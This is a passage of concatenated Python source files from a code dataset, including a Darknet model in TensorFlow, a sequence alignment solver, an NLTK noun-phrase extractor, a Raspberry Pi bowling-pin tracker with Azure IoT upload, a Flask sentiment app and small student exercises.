self.zeropadding_1(*args)\n return self.conv_2(x)\n\n\nclass CSPRblock(tf.keras.layers.Layer):\n \"\"\"Create an identity block for CSPRDarknet\"\"\"\n\n def __init__(self, filters, num_block):\n super(CSPRblock, self).__init__()\n self.conv_3 = DarknetConv2DBNLeaky(filters=filters, k_size=(3, 3))\n self.downsample_1 = DownSampling(filters)\n self.concat_1 = Concatenate(axis=0)\n self.splitter = lambda x: tf.split(x, num_or_size_splits=2, axis=0)\n self.num_block = num_block\n\n def call(self, *args):\n x = self.downsample_1(*args)\n x1, x2 = self.splitter(x)\n for block in range(self.num_block):\n x = self.conv_3(x1)\n x1 += x\n return self.concat_1([x1, x2])\n\n\nclass Darknet53(tf.keras.layers.Layer):\n \"\"\"All of the CSPRDarknet_53 but the last layer\"\"\"\n\n def __init__(self):\n super(Darknet53, self).__init__()\n self.conv_4 = DarknetConv2DBNLeaky(32, (3, 3))\n self.block = dict()\n self.block[0] = CSPRblock(64, 1)\n self.block[1] = CSPRblock(128, 2)\n self.block[2] = CSPRblock(256, 8)\n self.block[3] = CSPRblock(512, 8)\n self.block[4] = CSPRblock(1024, 4)\n\n # def call(self, *args):\n # y = []\n # x = self.conv_4(*args)\n # for i in range(len(self.block)):\n # x = self.block[i](x)\n # y.append(x)\n # y = y[-3:]\n # return y[::-1]\n\n def call(self, *args):\n x = self.conv_4(*args)\n x = self.block[0](x)\n x = self.block[1](x)\n y1 = self.block[2](x)\n y2 = self.block[3](y1)\n y3 = self.block[4](y2)\n return [y3, y2, y1]\n\n\nclass PredictionLayer(tf.keras.layers.Layer):\n \"\"\"Layer that make the predictions\"\"\"\n\n def __init__(self, filters, num_classes):\n super(PredictionLayer, self).__init__()\n self.conv_5 = Conv2D(filters=num_classes * (num_classes + 5),\n kernel_size=(3, 3),\n kernel_regularizer=l2(5e-4),\n padding='same')\n self.conv_6 = DarknetConv2DBNLeaky(filters * 2, (3, 3))\n self.conv_7 = DarknetConv2DBNLeaky(filters, (1, 1))\n\n def call(self, *args):\n x = self.conv_7(*args) # (1, 1)\n x = self.conv_6(x) # (3, 3)\n x = self.conv_7(x) # (1, 1)\n x = self.conv_6(x) # (3, 3)\n x = self.conv_7(x) # (1, 1)\n\n y = self.conv_6(x) # (3, 3)\n y = self.conv_5(y)\n\n return x, y\n\n\n","sub_path":"Archive/Darknet_53_v2.py","file_name":"Darknet_53_v2.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"507206099","text":"## Author : Ragavi Swarnalatha Raman (rraman2) - 200203611 ##\n#!/usr/bin/python\nimport sys\nimport random\n#sys.path.append(\"./task1/\")\nfrom handsimulation import Simulation\n\nargs = sys.argv\nif len(args) != 7:\n\tprint(\"Usage: driver.py \")\n\texit(1)\t\n\n## inputs and defaults\nmc = 0\nbuffer = 0\ncla = 2\ncls = 0\nclr = []\n\nmax_mc = int(args[5]) ## maximum Master Clock Value\nsimulation_table = []\n\n## arrival,completion and orbiting times\nCLA = float(args[1])\nCLS = int(args[3])\nCLR = float(args[2])\nb_size = int(args[4])\nseed = int(args[6])\nrandom.seed(seed)\n\ni=0\nfd = open(\"./output.txt\",'w+')\n\nsimul_obj = Simulation(mc,cla,buffer,cls,clr) ## Calling Simulation\nsimulation_table.append(['MC', 'CLA', 'Buffer', 'CLS', 'CLR'])\nsimulation_table.append([str(mc),str(cla),str(buffer),str(cls),str(clr)])\nwhile i <= max_mc:\n\tmc,cla,buffer,cls,clr = simul_obj.simulation(CLA,CLS,CLR,b_size,fd,seed)\n\tsimulation_table.append([str(mc),str(cla),str(buffer),str(cls),str(clr)])\n\ti = mc\n\nfd.write(\"Consolidated Simulation Output Table\"+'\\n\\n\\n')\nfor item in simulation_table:\n#\tprint(\" \t\".join(item))\n\tfd.write(\"\t\t \".join(item)+\"\\n\")\n\nprint(\"Generating Output in output.txt. Do 'cat output.txt'\")\nfd.close()\n \n","sub_path":"rraman2_task2/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"81109936","text":"\n\nfrom xai.brain.wordbase.adjectives._dicky import _DICKY\n\n#calss header\nclass _DICKIES(_DICKY, ):\n\tdef __init__(self,): \n\t\t_DICKY.__init__(self)\n\t\tself.name = \"DICKIES\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"dicky\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_dickies.py","file_name":"_dickies.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"269388294","text":"MIN = -float(\"inf\")\r\n\r\ndef init_matrix(nrow, ncol, gape_open, gape_ext):\r\n M = [[MIN] * ncol for i in range(nrow)]\r\n Ix = [[MIN] * ncol for i in range(nrow)]\r\n Iy = [[MIN] * ncol for i in range(nrow)]\r\n \r\n M[0][0] = 0 \r\n Ix[0][0] = Iy[0][0] = MIN\r\n for i in range(1, nrow):\r\n M[i][0] = MIN\r\n Ix[i][0] = gape_open + (i - 1) * gape_ext\r\n Iy[i][0] = MIN\r\n for j in range(1, ncol):\r\n M[0][j] = MIN\r\n Ix[0][j] = MIN\r\n Iy[0][j] = gape_open + (j - 1) * gape_ext\r\n\r\n return M, Ix, Iy\r\n\r\ndef distance_matrix(P, Q, M, Ix, Iy, gape_open, gape_ext, A, R):\r\n nrow = len(Q) + 1\r\n ncol = len(P) + 1\r\n \r\n for i in range(1, nrow):\r\n for j in range(1, ncol):\r\n match = R[A.index(Q[i-1])][A.index(P[j-1])]\r\n Ix[i][j] = max((M[i-1][j] + gape_open),\\\r\n (Ix[i-1][j] + gape_ext),\\\r\n (Iy[i-1][j] + gape_open),)\r\n Iy[i][j] = max((M[i][j-1] + gape_open),\\\r\n (Ix[i][j-1] + gape_open),\\\r\n (Iy[i][j-1] + gape_ext))\r\n M[i][j] = max((M[i-1][j-1] + match),\\\r\n (Ix[i-1][j-1] + match),\\\r\n (Iy[i-1][j-1] + match))\r\n\r\n return M, Ix, Iy\r\n\r\ndef backtrace(P, Q, M, Ix, Iy, gape_open, gape_ext, A, R):\r\n nrow = len(Q)\r\n ncol = len(P)\r\n mx_score = M[nrow][ncol]\r\n cur_m = 'M'\r\n if mx_score < Ix[nrow][ncol]:\r\n mx_score = Ix[nrow][ncol]\r\n cur_m = 'Ix'\r\n if mx_score < Iy[nrow][ncol]:\r\n mx_score = Iy[nrow][ncol]\r\n cur_m = 'Iy'\r\n sequ1 = ''\r\n sequ2 = ''\r\n i = len(Q)\r\n j = len(P)\r\n while (i>0 or j>0):\r\n if cur_m == 'M':\r\n match = R[A.index(Q[i-1])][A.index(P[j-1])]\r\n sequ1 += P[j-1]\r\n sequ2 += Q[i-1]\r\n i -= 1; j -= 1\r\n if (Ix[i][j] + match) == M[i+1][j+1]:\r\n cur_m = 'Ix'\r\n elif (Iy[i][j] + match) == M[i+1][j+1]:\r\n cur_m = 'Iy'\r\n else:\r\n cur_m = 'M'\r\n elif cur_m == 'Ix': \r\n sequ1 += '-'\r\n sequ2 += Q[i-1]\r\n i -= 1\r\n if (M[i][j] + gape_open) == Ix[i+1][j]:\r\n cur_m = 'M'\r\n elif (Iy[i][j] + gape_open) == Ix[i+1][j]:\r\n cur_m = 'Iy'\r\n else:\r\n cur_m = 'Ix'\r\n else: \r\n sequ1 += P[j-1]\r\n sequ2 += '-'\r\n j -= 1\r\n if (M[i][j] + gape_open) == Iy[i][j+1]:\r\n cur_m = 'M'\r\n elif (Ix[i][j] + gape_open) == Iy[i][j+1]:\r\n cur_m = 'Ix'\r\n else:\r\n cur_m = 'Iy'\r\n \r\n sequ1r = ''.join(reversed(sequ1))\r\n sequ2r = ''.join(reversed(sequ2))\r\n\r\n return mx_score, sequ1r, sequ2r\r\n \r\nD, E = map(int, input().split())\r\nA = input()\r\nsize = len(A)\r\nR = []\r\nfor i in range(size):\r\n R.append([int(i) for i in input().split()])\r\nP = input().rstrip()\r\nQ = input().rstrip()\r\n\r\n#import numpy\r\nncol, nrow = len(P) + 1, len(Q) + 1\r\nM, Ix, Iy = init_matrix(nrow, ncol, D, E)\r\nM, Ix, Iy = distance_matrix(P, Q, M, Ix, Iy, D, E, A, R)\r\n#print(numpy.array(backtrack))\r\nscore, str1, str2 = backtrace(P, Q, M, Ix, Iy, D, E, A, R)\r\n\r\nprint(score)\r\nprint(str1)\r\nprint(str2)\r\n","sub_path":"ШЦЭ 2019 Биоинформатика/Выравнивание строк.py","file_name":"Выравнивание строк.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"326875911","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom workspaces import views\n\n\nurlpatterns = [\n url(r'', include('social.apps.django_app.urls', namespace='social')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', views.home_page, name='homepage'),\n url(r'^users/$', views.UserList.as_view(), name='users'),\n url(r'^users/(?P[-\\w]+)$', views.user_detail, name='user'),\n url(r'^settings$', views.user_settings, name='user_settings'),\n url(r'^photos/', include('photo.urls', namespace='photo')),\n url(r'^logout/', views.logout, name='logout'),\n]\n\n\nif settings.DEBUG:\n from django.conf import settings\n urlpatterns += url(r'^media/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),\n","sub_path":"workspaces/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"612139875","text":"import nltk\nfrom nltk.corpus import brown\nfrom nltk.corpus import stopwords\n\nbrown_train = brown.tagged_sents(categories='news')\nregexp_tagger = nltk.RegexpTagger(\n [(r'^-?[0-9]+(.[0-9]+)?$', 'CD'),\n (r'(-|:|;)$', ':'),\n (r'\\'*$', 'MD'),\n (r'(The|the|A|a|An|an)$', 'AT'),\n (r'.*able$', 'JJ'),\n (r'^[A-Z].*$', 'NNP'),\n (r'.*ness$', 'NN'),\n (r'.*ly$', 'RB'),\n (r'.*s$', 'NNS'),\n (r'.*ing$', 'VBG'),\n (r'.*ed$', 'VBD'),\n (r'.*', 'NN')\n ])\nunigram_tagger = nltk.UnigramTagger(brown_train, backoff=regexp_tagger)\nbigram_tagger = nltk.BigramTagger(brown_train, backoff=unigram_tagger)\ncfg = {}\ncfg[\"NNP+NNP\"] = \"NNP\"\ncfg[\"NN+NN\"] = \"NNI\"\ncfg[\"NNI+NN\"] = \"NNI\"\ncfg[\"JJ+JJ\"] = \"JJ\"\ncfg[\"JJ+NN\"] = \"NNI\"\n\nclass NPExtractor(object):\n def __init__(self, sentence):\n self.sentence = sentence\n\n def tokenize_sentence(self, sentence):\n tokens = nltk.word_tokenize(sentence)\n return tokens\n\n def normalize_tags(self, tagged):\n n_tagged = []\n for t in tagged:\n if t[1] == \"NP-TL\" or t[1] == \"NP\":\n n_tagged.append((t[0], \"NNP\"))\n continue\n if t[1].endswith(\"-TL\"):\n n_tagged.append((t[0], t[1][:-3]))\n continue\n if t[1].endswith(\"S\"):\n n_tagged.append((t[0], t[1][:-1]))\n continue\n n_tagged.append((t[0], t[1]))\n return n_tagged\n\n def extract(self,stop_list):\n tokens = self.tokenize_sentence(self.sentence)\n\n stop_words = set(stop_list+stopwords.words('english'))\n\n # filtered_sentence = [w for w in tokens if not w in stop_words]\n # print(filtered_sentence)\n\n filtered_sentence = tokens\n # filtered_sentence = []\n #\n # for w in tokens:\n # if w not in stop_words:\n # filtered_sentence.append(w)\n # print(filtered_sentence)\n\n tags = self.normalize_tags(bigram_tagger.tag(filtered_sentence))\n merge = True\n while merge:\n merge = False\n for x in range(0, len(tags) - 1):\n t1 = tags[x]\n t2 = tags[x + 1]\n key = \"%s+%s\" % (t1[1], t2[1])\n value = cfg.get(key, '')\n if value:\n merge = True\n tags.pop(x)\n tags.pop(x)\n match = \"%s %s\" % (t1[0], t2[0])\n pos = value\n tags.insert(x, (match, pos))\n break\n matches = []\n for t in tags:\n if t[1] == \"NNP\" or t[1] == \"NNI\":\n matches.append(t[0])\n return matches\n\n\ndef main():\n\n item_list = []\n stop_list = []\n with open('englishWord.txt') as f:\n results = f.readlines()\n for res in results:\n item_list.append(res.strip())\n\n with open('stopWords.txt') as f:\n results = f.readlines()\n for res in results:\n stop_list.append(res.strip())\n\n for sentence in item_list:\n print(sentence)\n np_extractor = NPExtractor(sentence)\n result = np_extractor.extract(stop_list)\n # print(result)\n endResult = []\n for res in result:\n if len(res.split(' ')) == 1:\n continue\n res = res.replace('','')\n endResult.append(res)\n print(endResult)\n with open('结果.txt','a') as f:\n f.write(sentence+'\\n'+str(endResult)+'\\n')\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"homeWork/wordAnaly/splitWord.py","file_name":"splitWord.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"52813100","text":"def anti_vowel(x):\n x_list = list(x)\n vowels = ['a','e','i', 'o', 'u']\n for letter in x_list:\n\n if (letter.upper() == vowels or letter.lower() == vowels):\n x_list.remove(letter)\n #''.join(x_list)\n x = x_list\n x = ''.join(x)\n return x\n\nprint(anti_vowel(\"It has been a long time.\"))\n","sub_path":"anti_vowel.py","file_name":"anti_vowel.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"477001214","text":"# import the necessary packages\n\nimport time\nimport cv2\nimport numpy\nimport RPi.GPIO as GPIO\nimport Iothub_client_functions as iot\nimport picamera\nimport io\n# from picamera import PiCamera, Color\nfrom picamera.array import PiRGBArray\nimport picamera.array\nfrom PIL import Image\n\npinsGPIO = [15,14,3,2,21,20,16,5,26,6]\n# mask_crop_ranges = ([1100,1700, 220,2800],[0,0,0,0])\npin_crop_ranges = ([220,246,242,268],[197,223,221,247],[197,223,291,317],[177,203,202,228],[177,203,268,294],\n [177,203,268,294],[160,186,189,215],[161,187,246,272],[161,187,306,332],[160,186,369,395])\n\ndef setResolution():\n resX = 640\n resY = 480\n res = (int(resX), int(resY))\n return res\ndef setupGPIO(pins):\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n for pin in pins:\n GPIO.setup(pin,GPIO.OUT)\n print (\"setup Completed\")\n\ndef bit_GPIO(pins,pinCount):\n bits = \"{0:b}\".format(pinCount)\n while len(bits)<10:\n bits = \"0\"+bits\n for idx in range(0,len(bits)):\n if(bits[idx]==\"1\"):\n GPIO.output(pins[idx], GPIO.HIGH)\n else:\n GPIO.output(pins[idx], GPIO.LOW)\n\ndef writeImageSeries(frameNoStart, numberOfFrames, img_rgb):\n if frameNoStart <= frameNo:\n if frameNo <= frameNoStart+numberOfFrames:\n print ('Saving ../home/pi/Shared/videos/videoCCEFrame'+ str(frameNo) +'.jpg')\n cv2.imwrite('/home/pi/Shared/videos/videoCCEFrame'+ str(frameNo) +'.jpg',img_rgb)\n\ndef write_video(stream):\n# Write the entire content of the circular buffer to disk. No need to\n# lock the stream here as we're definitely not writing to it\n# simultaneously\n global motion_filename, frameNo, videoReadyFrameNo\n \n if frameNo1000:\n setterPresent = True\n firstSetterFrame = frameNo\n if setterPresent:\n activity = activity + str(priorPinCount)+ ',-2,'\n print(\"Green\", area, frameNo)\n else:\n firstSetterFrame = 0\n\ndef isResetArm():\n global firstArmFrame, armPresent, ballCounter\n global frameNo\n global img_rgb\n global img_gray1arm\n global threshArm\n frame2arm = img_rgb[160:280,440:480]\n img_gray2arm = cv2.cvtColor(frame2arm, cv2.COLOR_BGR2GRAY)\n diff = cv2.absdiff(img_gray1arm,img_gray2arm)\n # First value reduces noise. Values above 150 seem to miss certain ball colors\n ret, threshArm = cv2.threshold(diff, 120,255,cv2.THRESH_BINARY)\n frame = threshArm\n # Blur eliminates noise by averaging surrounding pixels. Value is array size of blur and MUST BE ODD\n threshArm = cv2.medianBlur(threshArm,15)\n print(type(img_rgb), type(frame2arm), type(threshArm), type(diff),type(img_gray1arm), type(img_gray2arm))\n cnts = cv2.findContours(threshArm.copy(), cv2.RETR_EXTERNAL,\n\t\tcv2.CHAIN_APPROX_SIMPLE)[-2]\n center = None\n radius = 0\n if len(cnts) > 0:\n\t\t# find the largest contour in the mask, then use\n\t\t# it to compute the minimum enclosing circle and centroid\n c = max(cnts, key=cv2.contourArea)\n ((xContour, yContour), radius) = cv2.minEnclosingCircle(c)\n if radius>15:\n print('Reset Arm', radius, frameNo, len(cnts))\n firstArmFrame = frameNo\n armPresent = True\n ballCounter = 0\n\ndef arm():\n global firstArmFrame\n global frameNo\n firstArmFrame = frameNo\n\ndef findPins():\n global x,x1,y,y1\n global priorPinCount\n global img_rgb\n global frame2\n pinCount = 0\n crop = []\n sumHist = [0,0,0,0,0,0,0,0,0,0]\n lower_red = numpy.array([0,0,70]) # lower_red = np.array([0,100,0])\n upper_red = numpy.array([110, 110, 255]) # upper_red = np.array([180,255,255])\n\n mask = cv2.inRange(img_rgb,lower_red,upper_red)\n output = cv2.bitwise_and(img_rgb, img_rgb, mask=mask)\n threshold1 = 10\n threshold2 = 10\n for i in range(0,6):\n crop.append(output[pin_crop_ranges[i][0]+y:pin_crop_ranges[i][1]+y1,pin_crop_ranges[i][2]+x:pin_crop_ranges[i][3]+x1])\n hist = cv2.calcHist([crop[i]],[1],None,[4], [10,50])\n sumHist[i] = hist[0]+hist[1]+hist[2]+hist[3]\n \n \n print (i, sumHist[i])\n if threshold1 < sumHist[i]:\n pinCount = pinCount + 2**(9-i)\n for i in range(6,10):\n crop.append(output[pin_crop_ranges[i][0]+y:pin_crop_ranges[i][1]+y1,pin_crop_ranges[i][2]+x:pin_crop_ranges[i][3]+x1])\n hist = cv2.calcHist([crop[i]],[1],None,[4], [10,50])\n sumHist[i] = hist[0]+hist[1]+hist[2]+hist[3]\n \n \n print (i, sumHist[i])\n if threshold2 < sumHist[i]:\n pinCount = pinCount + 2**(9-i)\n \n print('HIST', frameNo, pinCount)\n bit_GPIO(pinsGPIO,pinCount)\n\n if priorPinCount == pinCount:\n return False\n else:\n write_video(stream)\n priorPinCount = pinCount\n return True\n\ndef iotSend(buf):\n global frameNo\n try:\n client = iot.iothub_client_init()\n # if client.protocol == IoTHubTransportProvider.MQTT:\n print ( \"IoTHubClient is reporting state\" )\n reported_state = \"{\\\"newState\\\":\\\"standBy\\\"}\"\n client.send_reported_state(reported_state, len(reported_state), iot.send_reported_state_callback, iot.SEND_REPORTED_STATE_CONTEXT)\n filename = \"vidforblob\" + str(frameNo) + \".h264\"\n f = open(buf, \"rb+\")\n content = f.read()\n \n print(\"CONTENT LEN\", len(content), type(content))\n client.upload_blob_async(filename,content, len(content), iot.blob_upload_conf_callback,1001)\n\n\n except iot.IoTHubError as iothub_error:\n print ( \"Unexpected error %s from IoTHub\" % iothub_error )\n return\n except KeyboardInterrupt:\n print ( \"IoTHubClient sample stopped\" )\n\n iot.print_last_message_time(client) \n\nsetupGPIO(pinsGPIO)\nsetterPresent = False\narmPresent = False\nmaskFrame = True\npriorPinCount = 0\nactivity = \"\\r\\n\"\nx=0\nx1=0 +x\ny=0\ny1=0 + y\ncrop_ranges = ([300,470,5,450],[0,0,0,0])\nballCoords=[0]*100\nframeNo = 0\nprevFrame = 0\nballCounter = 0\nballCounterFrame = 0\nvideoReadyFrameNo = 0\norigCounter = 0\npinReactionTime = 0\npinReactionFlag = False\nvideo_preseconds = 3\nmotion_width = 640\nmotion_height = 480\nmotion_filename = \"DPBetaCIOTest\"\nfor i in range(0,1):\n a =(int(crop_ranges[i][2])+x,int(crop_ranges[i][0])+y)\n b = (int(crop_ranges[i][3])+x1, int(crop_ranges[i][1])+y1)\nwith picamera.PiCamera() as camera:\n camera.resolution = setResolution()\n camera.framerate = 25\n camera.video_stabilization = True\n camera.annotate_background = True\n camera.rotation = 180\n rawCapture = PiRGBArray(camera, size=camera.resolution)\n # setup a circular buffer\n # stream = picamera.PiCameraCircularIO(camera, seconds = video_preseconds)\n stream = picamera.PiCameraCircularIO(camera, size = 1000000)\n # video recording into circular buffer from splitter port 1\n camera.start_recording(stream, format='h264', splitter_port=1)\n #camera.start_recording('test.h264', splitter_port=1)\n # low resolution motion vector analysis from splitter port 2\n camera.start_recording('/dev/null', splitter_port=2, resize=(motion_width,motion_height) ,format='h264')\n # wait some seconds for stable video data\n camera.wait_recording(2, splitter_port=1)\n motion_detected = False\n\n print(camera.resolution)\n time.sleep(1)\n for frame in camera.capture_continuous(rawCapture,format=\"bgr\", use_video_port=True):\n # grab the raw NumPy array representing the image, then initialize the timestamp\n # and occupied/unoccupied text\n rawCapture.truncate()\n rawCapture.seek(0)\n \n frame2 = frame.array\n if maskFrame:\n frame1 = frame.array\n # mask= frame1[650:900, 250:1500]\n # mask= frame1[500:900, 100:1240]\n mask = frame1[300:470,5:450]\n # mask = frame1[300,470,5,450]\n frame1 = mask\n maskFrame = False\n continue\n frameNo = frameNo +1\n img_rgb = frame2\n frame1arm = frame2[160:280,440:480]\n img_gray1arm = cv2.cvtColor(frame1arm, cv2.COLOR_BGR2GRAY)\n # cv2.imwrite('../videos/videoCCEFrame'+ str(frameNo) +'.jpg',img_rgb)\n # if pinReactionFlag:\n # if time.process_time()-3 > pinReactionTime:\n \n # activity = activity + str(priorPinCount)+','\n # print(activity)\n # pinReactionFlag = False\n\n # # if setterPresent:\n # # if firstSetterFrame + 60 > frameNo:\n # # continue\n # if armPresent:\n # if firstArmFrame + 70 > frameNo:\n # continue\n # if firstArmFrame+ 70 == frameNo:\n # armPresent = False\n # activity = activity + str(priorPinCount)+ ',-1,'\n if setterPresent:\n if firstSetterFrame + 120 > frameNo:\n continue\n if armPresent:\n if firstArmFrame + 120 > frameNo:\n continue\n if firstArmFrame+ 120 == frameNo:\n ballCounter = 0\n armPresent = False\n if setterPresent or armPresent:\n continue\n isPinSetter()\n isResetArm()\n \n # frame2= frame2[320:480,40:565]\n \n # frame2= frame2[650:900, 250:1500]\n frame2= frame2[300:470,5:450]\n img_gray1 = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)\n img_gray2 = cv2.cvtColor(frame2, cv2.COLOR_BGR2GRAY)\n diff = cv2.absdiff(img_gray1,img_gray2)\n # First value reduces noise. Values above 150 seem to miss certain ball colors\n ret, thresh = cv2.threshold(diff, 120,255,cv2.THRESH_BINARY)\n frame = thresh\n # Blur eliminates noise by averaging surrounding pixels. Value is array size of blur and MUST BE ODD\n thresh = cv2.medianBlur(thresh,13)\n cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)[-2]\n center = None\n radius = 0\n if len(cnts) > 0:\n # find the largest contour in the mask, then use\n # it to compute the minimum enclosing circle and centroid\n c = max(cnts, key=cv2.contourArea)\n # ((xContour, yContour), radius) = cv2.minEnclosingCircle(c)\n print('Ball Area', frameNo, len(cnts))\n if prevFrame + 15 < frameNo:\n ballCounter = ballCounter + 1\n print(\"BALLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL\", ballCounter)\n prevFrame = frameNo\n # only proceed if the radius meets a minimum size\n # if radius > 5:\n # # draw the circle and centroid on the frame,\n # # then update the list of tracked points\n # M = cv2.moments(c)\n # center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n # cv2.drawContours(img_gray2, cnts, -1, (0,255,0), 3)\n # if prevFrame + 15 < frameNo:\n # ballCounter = ballCounter + 1\n # prevFrame = frameNo\n # print('BALL CENTER',center, radius, frameNo, len(cnts), ballCounter)\n \n # cv2.imwrite('P:videos/cv2Img'+str(frameNo)+'.jpg',img_gray2)\n img_gray1=img_gray2 \n cv2.imshow('Ball', img_gray2)\n cv2.imshow('Arm', threshArm)\n # cv2.imshow('Thresh' , thresh)\n camera.annotate_text = \"Date \"+ str(time.process_time()) + \" Frame \" + str(frameNo) + \" Prior \" + str(priorPinCount)\n # writeImageSeries(20, 3, img_rgb)\n # cv2.imshow('Frame' , img_rgb)\n if frameNo%5 ==0:\n tf = findPins() \n\n # cv2.rectangle(img_rgb,b, a, 255,2)\n\n # cv2.imshow('IMG_RGB with Ball Rect', img_rgb)\n # writeImageSeries(135,20)\n \n key = cv2.waitKey(1) & 0xFF\n \n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n","sub_path":"DPBetaCircIO640.py","file_name":"DPBetaCircIO640.py","file_ext":"py","file_size_in_byte":13756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"243965224","text":"from flask import *\nimport numpy as np\nimport pandas as pd\nimport re\nimport string\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import load_model\n\napp = Flask(__name__)\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\n\n\ndata = pd.read_csv('D:\\\\PycharmProject\\\\SentimentAnalysisGui\\\\static\\\\TweetsText.csv')\ndata = data[data['airline_sentiment'] != 'neutral']\n\n\ndef clean_tweet(text):\n tweet = ''\n tweet = re.sub('[' + string.punctuation + ']', '', text)\n tweet = re.sub(r\"http\\S+|www\\S+|https\\S+\", '', text, flags=re.MULTILINE)\n # Remove user @ references and '#' from tweet\n tweet = re.sub(r'\\@\\w+|\\#', '', text)\n return tweet\n\ndata['text'] = data['text'].apply(lambda x: clean_tweet(x))\n\nfor idx, row in data.iterrows():\n row[0] = row[0].replace('rt', '')\n\nmax_fatures = 2000\ntokenizer = Tokenizer(num_words=max_fatures, split=' ')\ntokenizer.fit_on_texts(data['text'].values)\nX = tokenizer.texts_to_sequences(data['text'].values)\npad_sequences(X)\n\nbaslik = (\"Cümle\", \"Duygu Tahmini\")\n\nsentenceList = []\nsentimentList = []\n@app.route('/', methods=['GET', 'POST'])\ndef sentiment_analyisis():\n if request.method == 'POST':\n sentence = request.form['sentimentText']\n sentenceList.clear()\n sentimentList.clear()\n sentenceList.append(sentence)\n result(sentence)\n\n return render_template('index.html', headings=baslik, k=sentenceList, l=sentimentList)\n\n\ndef result(text):\n try:\n\n if text == '':\n flash(\"Try Again...\", \"warning\")\n else:\n tweet = [text]\n tweet = tokenizer.texts_to_sequences(tweet)\n tweet = pad_sequences(tweet, maxlen=29, dtype='int32', value=0)\n model = load_model('D:\\\\PycharmProject\\\\SentimentAnalysisGui\\\\static\\\\best_model.h5')\n sentiment = model.predict(tweet, batch_size=1, verbose=0)[0]\n if (np.argmax(sentiment) == 0):\n # print(\"negative\")\n flash(\"Negative Sentence\", \"danger\")\n sentimentList.append('Negative Sentence')\n\n elif (np.argmax(sentiment) == 1):\n # print(\"positive\")\n flash(\"Positive Sentence\", \"success\")\n sentimentList.append('Positive Sentence')\n\n except BaseException as ex:\n print(ex)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"SentimentAnalysisGui/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"336902159","text":"def main():\n # Part 1\n schools1 = {'USC':'Lost Angeles','Oregon':'Eugene',\n 'Arizona':'Tempe','Utah':'Salt Lake City'}\n\n schools2 = {'USC':'Trojans','Oregon':'Ducks','Arizona':'Wildcats',\n 'Utah':'Utes'}\n again = 'y'\n while again.lower() == 'y':\n school = input(\"Enter the name of school: \")\n if school in schools1:\n print(school, 'Location:',schools1[school],'Nickname:',schools2[school])\n else:\n print(\"That school is invalid.\")\n\n again = input(\"Wanna do this again? (y/n) \")\n # Part 2\n medals = {'Norway':[14,14,11],'Germany':[14,10,7],'Canada':[11,8,10]}\n medals['USA'] = [9,8,6]\n medals['Netherlands'] = [8,6,6]\n medals['Sweden'] = [7,6,1]\n print('Medal Count for 2018 Winter Olympics')\n displayData(medals)\n countries = medals.keys()\n for c in countries:\n print(c, ' ',end='')\n print()\n lists = medals.values()\n print(lists)\n for x in lists:\n print(x)\n sweden = medals.pop(\"Sweden\",\"Not in the list\")\n print(\"Sweden data:\",sweden)\n print(\"New Medal Count for 2018 Winter Olympics\")\n displayData(medals)\n\ndef displayData(d):\n for key in d:\n print(key,'won',d[key][0],'gold medals,',d[key][1],'silver medals, and',\n d[key][2],'bronze medals')\n \nmain()","sub_path":"ICA/Ch9Pt1.py","file_name":"Ch9Pt1.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"541137076","text":"import sys\n\n#compatibility\ntry: input = raw_input\nexcept NameError: pass\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n \ncolors = { \n 'GREEN': bcolors.OKGREEN,\n 'BLUE': bcolors.OKBLUE,\n 'MAGENTA': bcolors.HEADER,\n 'PURPLE': bcolors.HEADER,\n 'YELLOW': bcolors.WARNING,\n 'RED': bcolors.FAIL,\n 'NONE': bcolors.ENDC\n}\n\nattribs = {\n 'BOLD' : bcolors.BOLD,\n 'UNDERLINE': bcolors.UNDERLINE,\n}\n\nexit_cond = lambda x: x in {'q', 'quit', 'leave', 'exit'}\n\ndef set_exit_cond(condition):\n global exit_cond\n exit_cond = condition\n\ndef get_char(s, char_list):\n while( True ):\n string = input(s)\n if 